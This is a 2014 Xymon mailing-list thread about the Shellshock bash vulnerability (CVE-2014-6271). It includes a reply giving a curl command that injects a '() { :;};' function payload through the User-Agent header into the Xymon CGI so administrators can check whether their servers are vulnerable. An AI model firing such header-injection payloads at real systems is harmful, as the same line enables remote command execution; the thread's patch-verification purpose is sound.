Oh, yes, very terrible.
And if you want to test to see that you are vulnerable through Xymon, you can try this harmless exploit:
your_workstation$ curl -k -H 'User-Agent: () { :;}; echo vulnerable>/tmp/test-xymon-shellshock' http://your_xymon_server/xymon-cgi/svcstatus.sh <html><head><title>Invalid request</title></head> <body>Invalid request</body></html> your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock' vulnerable your_workstation$ ...which creates a file (if you are vulnerable) in your Xymon server '/tmp/':
your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock' vulnerable your_workstation$ ...so then, you can verify before and after patching.
cheers,
Troy
----- Original Message ----- From: "J.C. Cleaver" <user-87556346d4af@xymon.invalid> To: xymon at xymon.com Sent: Wednesday, September 24, 2014 11:54:35 AM GMT -07:00 US/Canada Mountain Subject: [Xymon] FYI: CVE-2014-6271 - bash vulnerability
This is an important one to patch your systems on, if you haven't already.
The xymon CGI interface runs via shell wrappers around the actual C cgi code (to set the environment properly), which means this would be an avenue for attack.
Alternatively, using /bin/dash or some other shell besides bash (often /bin/sh on Linux distros) is another work around. (This is the default on the Terabithia RPMS for EL6.)
More info: http://seclists.org/oss-sec/2014/q3/650
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ https://access.redhat.com/articles/1200223
Regards, -jc
--
This communication is intended for the use of the recipient to whom it
is addressed, and may contain confidential, personal, and or privileged
information. Please contact us immediately if you are not the intended
recipient of this communication, and do not copy, distribute, or take
action relying on it. Any communications received in error, or
subsequent reply, should be deleted or destroyed.
---